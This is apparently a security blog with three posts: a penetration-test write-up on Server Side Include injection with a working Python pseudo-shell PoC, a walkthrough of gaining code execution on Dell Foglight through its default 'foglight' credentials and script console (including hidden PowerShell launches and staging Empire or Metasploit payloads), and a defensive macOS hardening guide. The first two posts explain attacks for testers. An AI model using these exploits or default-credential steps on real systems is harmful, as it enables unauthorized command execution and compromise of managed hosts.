Exploiting Server Side Include Injection


Recently I was performing a penetration test and came across a Server Side Include injection bug (SSI).  If you are familiar with cross-site scripting (XSS) this type of vulnerability will sound familiar.  This is caused by an application taking input form the user, and supplying it in the response from the server.  The mitigations are the same for XSS, sanitize/encode data before returning it. Consider using white-listed values.

Where this is different than XSS is that in the case of SSI injection, the use supplied data doesn’t just end up in the HTML returned to the user, it ends up being evaluated by the server itself.  Here is some code that is similar to what I had found:

First the $name parameter was populated by a POST variable supplied by the user:

$name = $_POST['name'];

And below in the code the value that the user provided is reflected back within the application response.

<input name="name" value="<?php if (isset($name)) { echo $name; } ?>

Likely the developer did this because they wanted to refill the form for the user if they made a mistake and needed to resubmit the form.

The Apache documentation on SSI shows how to use a server side include. Note the portion under executing commands:

“You can actually have SSI execute a command using the shell (/bin/sh, to be precise – or the DOS shell, if you’re on Win32).”

The syntax is simple:

<!--#exec cmd="COMMAND" -->

If we were to supply something similar within the name parameter, our server side include would be executed and then be returned in the response.

In the default configuration,  web servers won’t have SSI enabled, or won’t allow for the exec command.  Some applications will have a legitimate need to use SSI, and developers/admins will enable this functionality.

Here is some PoC code to exploit this issue:

import requests
while True:
    cmd = raw_input('shell> ')
    payload = "MAGIC<!--#exec cmd='%s' -->MAGIC" % (cmd)
    r = requests.post("URL", data = {"name": payload})
    delimiter = 'MAGIC'
    output = r.text.split(delimiter, 2)[1]
    print output
  1. Import the requests library to interact via HTTP
  2. Start an infinite loop
  3. Take in a string to be executed as a command
  4. Craft the payload.  This is an include tag that will exec the supplied string from line 3
  5. Send the payload in an HTTP POST within the “name” parameter
  6. Define the delimiter.  This will be used to identify the command output within the response
  7. Split the response and set the “output” variable to only contain the command output
  8. Print the output to the screen

This creates a type of “pseudo-shell” that we can use to interact with the web server.  We won’t be able to do anything interactive or change directories, but we can send any OS command to the server and receive the output.


Exploiting an unsecured Dell Foglight server

 

Dell Foglight for Virtualization is an infrastructure performance monitoring tool that can also be used to manage systems as well.  It comes configured with a default username and password of “foglight”.

It is possible to execute code on the host itself through an integrated scripting console.

By browsing to Homes -> Administration

And then browsing to Investigate -> Data -> Script Console

Under the “Scripts” tab, click the [+] Add button.

From here you can enter any groovy code and execute it on the host.  A simple way to execute commands is by using:

"cmd.exe /c ".execute

or

"powershell.exe -NoP -NonI -W Hidden -Enc".execute

This is a good place to swap in your Powershell Empire or Metasploit Web Delivery stage 0 payload.

Foglight also has the ability to execute code on the devices which it manages.

By browsing to Homes -> Automation

And then browsing to the Workflow Management tab and clicking the [+] New button.

When within the Workflow Studio click All ActionPacks -> Common -> Scripting

Here you will see a few choices:

  • Run PowerShell Script
  • Send and Run Command(s)
  • Send and Run PowerShell script

I was not able to create a functional workflow, however with this it is likely possible to push a malicious workflow to all managed devices.

One other notable feature of Foglight is that it stores credentials.

By browsing to Dashboards-> Administration -> Credentials

and then click Manage Credentials.

According to the Foglight UI, “A lockbox contains a collection of encrypted credentials and the keys for their encryption and decryption.” While there does not seem to be a way to extract the credential plaintext thorough the UI, it is likely possible to compromise and decrypt these stored credentials once the host is compromised.


Securing a default installation of MacOS

 

This was originally written as the basis for a GIAC Gold paper.  Ultimately, it was not unique enough to warrant a research paper, but will provide an overview of the security features of MacOS.

 

As of mid 2016, MacOS captures nearly 10% of the global market for desktop PC software.  While Apple computers have long had the reputation of being more secure than the more popular Windows operating system, they are also susceptible to many of the same attack vectors.  While MacOS comes built in with a number of strong security features, users of MacOS can take steps to improve the security of their device through a number of configuration changes as well utilization of security software.  In this post we will explain some of the security features built into MacOS and how to configure them properly, as well as provide information about additional software that can improve the security posture of the system.

1.   Introduction

Security of endpoint workstations is essential.  Threats can include remote exploits against running services, malware infections via the web or through email, or physical attacks against against the system.  By securing workstations we can reduce the likelihood that sensitive data can obtained by unauthorized third parties, and save time from not having to eradicate malware, restore from system backups, or having to reinstall operating systems and applications (NIST, 2016).

There are a wide variety of threats that exist against a system running MacOS.  The first is local threats.  Local threats require physical access to the system.  Aside from physical controls, software based controls can be used to mitigate these attacks.  Utilizing firmware passwords as well as encryption of the hard drive can prevent access to the data even if the hard drive is removed from the system.  Physical attackers could also exploit a workstation if it is left unattended and unlocked.  Passwords should be used to authenticate to a workstation and the password should be strong (NIST, 2016).

Remote threats attack services that are running on the system.  Services that do not require authentication or fail to use encryption are desirable targets for attackers.  This can be mitigated by removing unused or vulnerable services and staying up to date on security patches.  Using a firewall can also reduce the attack surface rendering vulnerable services inaccessible to a remote attacker (NIST, 2016).

Malicious payloads can find their way onto a system through a number of different vectors, to include web browsing, email, and removable media.  But utilizing low privileged accounts for daily use, we can reduce the dame from a malware infection.  Anti-virus can quarantine known malicious payloads before they are given the opportunity to execute (NIST, 2016).

This paper provides information on securing an installation of MacOS.  By implementing these recommendations users will be able to better secure their systems and the systems within their respective organizations. While each environment will have unique requirements, this should serve as a guideline.  Some of these suggestions may remove functionality that may be desired or required.  The acceptable tradeoff between security and functionality are to be determined by the reader.

2.   Built-in Security Controls

2.1.      Software Updates

With the release of MacOS Sierra Apple brought in a number of new security updates.  Apple helps users keep up to date with the latest software by sending notifications whenever new updates are available, and can be downloaded with a click of a button.  This helps users quickly their software up to the latest version.

To configure the App sore to check for updates automatically, go to System Preferences, click on App Store, and ensure that “Automatically check for updates” is selected.

It is important to patch quickly. After a vulnerability is discovered, it is usually patched quickly, but this does no good if the patch is applied. It doesn’t take much time until after a patch is released that public exploits become available (Levin, 2016).

2.2.      Gatekeeper

Gatekeeper was first introduced in OS X Lion and used to enforce code signing, which reduces the likelihood of an application containing malware.  By default, MacOS will only run applications downloaded from the Mac App Store and applications which are signed with a valid developer ID.  It can also be configured to only allow applications from the App Store, or alternatively to allow unsigned applications (NIST, 2016).

2.3.      XProtect

Apple’s anti-malware protection is known as X-Protect.  It first became available in OS X Snow leopard. When an application is downloaded from a quarantine aware application such as a web browser or an instant messenger.  It works by comparing an application against any known malware signatures.  The definitions are silently updated and enabled by default. When you an application is downloaded a quarantine bit it set, and the quarantine is compared against a list of malware definitions in System/Library/Core Services/CoreTypes.bundle/Contents/Resources/XProtect.plist.  If there is a match, you will receive a warning message.  XProtect doesn’t contain any advanced heuristics, but it should be left on as it protects against common strains of malware (Hoffman, 2015).

2.4.      FileVault

MacOS also comes with an encryption utility called FileVault. Since OS X Lion, the utility allows for full disk encryption. It can also be used to encrypt removable drives as well as Time Machine back-ups.

FileVault has no noticeable effect on performance.  If the device is ever compromised, it renders the data on the system inaccessible.  Apple explains this in their FileVault Best Practices whitepaper, “All computers have firmware of some type—EFI, BIOS—to help in the discovery of hardware components and ultimately to properly bootstrap the computer using the desired OS instance. In the case of Apple hardware and the use of EFI, Apple stores relevant information within EFI to aid in the functionality of OS X. For example, the FileVault key is stored in EFI to transparently come out of standby mode.” (Apple, 2012)

It is possible that the decryption key could be recovered if the system is left on in standby mode.  During standby, the key resides in memory and if the RAM was dumped the key could be extracted. The key can be destroyed during standby to mitigate this attack vector. One option is to enforce hibernation which will evict the FileVault keys from memory.  You can also remove them in standby mode using the pmset utility via the following command:

pmset destroyfvkeyonstandby 1

2.5.      Firewall

MacOS also comes with a built in firewall.  By default, it is not enabled.  MacOS does not come configured with many listening services.  With the firewall enabled, users have the ability to block all incoming connections, or configure incoming connections on a per app basis.  By default, signed applications will be able to receive incoming connections.  There is also the option for “stealth mode”, which ignores ICMP packets and will not provide a response (Hoffman, 2014).  It is recommended to block incoming connections unless there is a service running on the system that requires it.

2.6.      Keychain

MacOS also has built in features for password management.  The primary way MacOS manages passwords is through the Keychain. The keychain is an app that can store passwords as well as account information.  The keychain can also be used to manage certificates that are used to validate websites, digital documents, and other web-based material (Apple, 2016).  The keychain is typically set the same as the login password, but can also be set to a different password. To reduce the likelihood of having the keychain password compromised, it should be set to something other than your logon password.  By default, the keychain will not lock when your computer goes to sleep. You can use the Keychain Access Utility to enable the keychain to lock when sleeping and to lock after a certain number of minutes (NIST, 2016).

2.7.      Sandboxing

Apple has enforced sandboxing on applications that come from the Mac app store.  This helps mitigate the effects of software flaws within apps that could compromise the host system.  While this reduces the functionality of certain apps, (Martin, 2011) it offers tremendous security gains.  It is also possible to force any application to run in a sandbox using the sandbox-exec tool. (Prandzioch, 2016) To use sandboxing on applications other than those on the App store, I recommend using https://github.com/pansen/macos-sandbox-profiles.  While sandboxing is not always 100& effective, (Core Security, 2011) it can reduce the harm from an exploited application.

2.8.      System Integrity Protection

Another security feature that first came to Mac with OS X El Capitan is SIP (System Integrity Protection).  SIP, sometimes referred to as “rootless” can help prevent against potentially malicious software from modifying protected files. Basically what it does is it restricts the permissions of the root user account.  With this in place, only processes signed by Apple can modify these protected areas.  There are not many good reasons to disable SIP and it is highly recommended to leave this on (Apple, 2016).

3.   Configuration

3.1.      User Account Management

MacOS allows for users to automatically login during start-up.  This should not be used.  If you enable automatic login, the keychain password is stored in /etc/kcpassword XOR’d with a known key, allowing anyone which access to the machine to recover the password plaintext (StackExchange, 2012).

When receiving a fresh installation of MacOS, the first user account created is an administrative user account.  Administrative users are members of the admin group and have sudo permissions enabling them to control other user accounts to include that of root.   Apple recommends the following when creating user accounts, “to reduce exposure to harmful apps or files, limit the number of administrator users you create. Consider creating a standard user for your daily work and use the administrator user only when you need to install software or administer users.” (Apple, 2016)

Apple also allows users to create a guest user.  The inclusion of the guest user is so that friends and family can use the system without a password, without gaining access to the files of the owner.  This can be helpful to many, however it creates a certain level of risk.  If there exists a local privilege escalation exploit against MacOS that has not been patched, it may be able to be exploited via the guest user account.  Unless explicitly needed, for this reason the guest account should be disabled. (NIST, 2016)

3.2.      Firmware Password

Enabling firmware passwords can increase the security level of an MacOS system.  Firmware passwords are set on the actual logicboard’s firmware.  It is an EFI password that can keep the Mac from being booted from an external boot volume or into single user mode.  In the past, firmware passwords could usually be bypassed by removing the memory, but here this is not the case (Tanasi, 2017).  The firmware can also prevent direct memory access via interfaces like FireWire.  The firmware password stays with the host system so removing the drive and bringing it to another system would not remove the password (Apple, 2012).  While this is a strong control, it is not completely immune from all attacks.  In 2016 a security researcher discovered a way to bypass some implementations by re-flashing the chip (osxreverser , 2016).  This does not recover the password, but would still grant access.  The only way approved way to remove the firmware password without knowing it is by taking the system to an Apple retail store or an Apple authorized service provider (Apple, 2016).

3.3.      Bonjour

Bonjour is the name for Apple’s implementation of zero configuration networking. It is used for service discovery, address assignment, and hostname resolution. Because bonjour advertises all the system’s capabilities, it provides information to attackers about what type of software is running on the system (Tanasi, 2016). A whitepaper presented during the 2016 IEEE Symposium on security and privacy, a group of researchers identify a number of apple services that use zero configuration frameworks that present a lack of security in their implementation, such as Apple Handoff and Airdrop. Because the zero configuration protocol has no means to validate identity, and service relying on it is vulnerable to MITM (Man in the Middle) attacks. This would allow an attacker on the same network segment to intercept files being transferred (Bai, 2016).

3.4.      Disable sharing

On a new MacOS system, all sharing is disabled by default. This is the most secure state.  If sharing is necessary, certain precautions should be taken into consideration.

3.4.1.   Screen Sharing and Remote Management

These two services allow remote control of the system similar to to popular screen sharing applications based upon VNC.  The only time this would be needed typically is in regards to remote support.  If this is needed, ensure that authentication is used with a strong password.  Disable when not in use (NIST, 2016).

3.4.2.   Remote Login

Remote login controls access to both SSH and SFTP. The protocols themselves are relatively secure, but unless needed, they should remain disabled.  For additional security SSH can be configured to only allow key based authentication by editing /etc/ssh_config and setting the following values: (stackexchange, 2017)

PermitRootLogin no

PasswordAuthentication no

PermitEmptyPasswords no

ChallengeResponseAuthentication no

 

References

American Psychological Association. (2010). APA Manual (Publication manual of the American Psychological Association) (6th ed.). Washington, DC: American Psychological Association.

Citefast, Citefast automatically formats citations: APA 6th edition, MLA 7th ed. and Chicago 16th ed. (n.d.). Retrieved July 29, 2014, from http://www.citefast.com/

Strunk, W., & White, E. B. (1999). The elements of style. Boston: Allyn and Bacon.

About System Integrity Protection on your Mac. (2016, November 07). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204899

Osxreverser. (2016, June 25). Apple EFI firmware passwords and the SCBO myth. Retrieved January 14, 2017, from https://reverse.put.as/2016/06/25/apple-efi-firmware-passwords-and-the-scbo-myth/

Apple OS X Sandbox Predefined Profiles Bypass. (2011, November 10). Retrieved January 14, 2017, from https://www.coresecurity.com/content/apple-osx-sandbox-bypass

Atlas, K. (2016, October 06). OS X Config Check. Retrieved January 14, 2017, from https://github.com/kristovatlas/osx-config-check

Badger, L., Souppaya, M., Trapnell, M., Trapnell, E., Yaga, D., & Scarfone, K. (2016). Guide to securing Apple OS X 10.10 systems for IT professionals: a NIST security configuration checklist. NIST Special Publication (SP) 800 -179. doi:10.6028/nist.sp.800-179

Bai, X., Xing, L., Zhang, N., Wang, X., Liao, X., Li, T., & Hu, S. (2016). Staying Secure and Unprepared: Understanding and Mitigating the Security Risks of Apple ZeroConf. 2016 IEEE Symposium on Security and Privacy (SP). doi:10.1109/sp.2016.45

Best Practices for Deploying FileVault 2. (2012). Apple Technical White Paper. Retrieved January 14, 2017, from http://training.apple.com/pdf/WP_FileVault2.pdf

Bookwalter, J. (2016, November 22). Radio Silence 2 review: Set it and forget it Mac firewall for outgoing connections. Retrieved January 14, 2017, from http://www.macworld.com/article/3143072/security/radio-silence-2-review-set-it-and-forget-it-mac-firewall-for-outgoing-connections.html

Desktop OS market share 2012-2016. (n.d.). Retrieved January 14, 2017, from https://www.statista.com/statistics/218089/global-market-share-of-windows-7/

Does activating auto-login compromise secure password storage? (2012, May 7). Retrieved January 14, 2017, from http://apple.stackexchange.com/questions/50652/does-activating-auto-login-compromise-secure-password-storage

Hands Off! (n.d.). Retrieved January 14, 2017, from https://www.oneperiodic.com/products/handsoff/

Hoffman, C. (2014, December 20). Your Mac’s Firewall is Off By Default: Do You Need to Enable It? Retrieved January 14, 2017, from http://www.howtogeek.com/205108/your-mac%E2%80%99s-firewall-is-off-by-default-do-you-need-to-enable-it/

Hoffman, C. (2015, May 18). XProtect Explained: How Your Mac’s Built-in Anti-malware Software Works. Retrieved January 14, 2017, from http://www.howtogeek.com/217043/xprotect-explained-how-your-macs-built-in-anti-malware-works/

How to use SSH keys and disable password authentication (2016, Jan 27). Retrieved January 22 2017, from http://apple.stackexchange.com/questions/225231/how-to-use-ssh-keys-and-disable-password-authentication

Kessler, T. (2014, December 17). The four Mac security options everyone should know. Retrieved January 14, 2017, from http://www.macworld.com/article/2855020/the-four-mac-security-options-everyone-should-know.html

Keychain Access: Keychain Access overview. (2016, May 4). Retrieved January 14, 2017, from https://support.apple.com/kb/PH20093?locale=en_US

Levin, J. (2016). MacOS and iOS Internals (Vol. 3, Security & Insecurity ). New York, NY: Technologeeks Press.

  1. (2017, January 02). MacOS Security and Privacy Guide. Retrieved January 14, 2017, from https://github.com/drduh/macOS-Security-and-Privacy-Guide

Martin, D. W. (2011, November 7). OS X Lion Sandboxing Is A Killjoy Destined To Ruin Our Mac Experience. Retrieved January 14, 2017, from http://www.cultofmac.com/113977/os-x-lion-sandboxing-is-a-killjoy-destined-to-ruin-our-mac-experience/

Norvell, P. (2002). Improving the Security of a Default Install of Mac OS X. SANS Institute InfoSec Reading Room. Retrieved January 14, 2017, from https://www.sans.org/reading-room/whitepapers/apple/improving-security-default-install-mac-os-v101-240.

Piper, S. (2016, September 11). OS X Lockdown. Retrieved January 14, 2017, from https://github.com/SummitRoute/osxlockdown

Prandzioch, D. (2016, April 11). OS X: Run any command in a sandbox. Retrieved January 14, 2017, from https://www.davd.eu/os-x-run-any-command-in-a-sandbox/

Set your Mac to automatically log in during startup. (2016, December 06). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT201476

Singh, S. (2013, August 30). Mac OSX-STIG. Retrieved January 14, 2017, from https://github.com/find-evil/Mac-OSX-STIG

Tanasi, A. (2016). MacOS 10.12 Sierra. Retrieved January 14, 2017, from http://docs.hardentheworld.org/OS/MacOS_10.12_Sierra/index.html

Use a firmware password on your Mac. (2016, March 22). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204455

Wardle, P. (2015). BlockBlock. Retrieved January 14, 2017, from https://objective-see.com/products/blockblock.html

Ways to avoid harmful software. (2016). Retrieved January 14, 2017, from https://help.apple.com/machelp/mac/10.12/index.html#/mh11389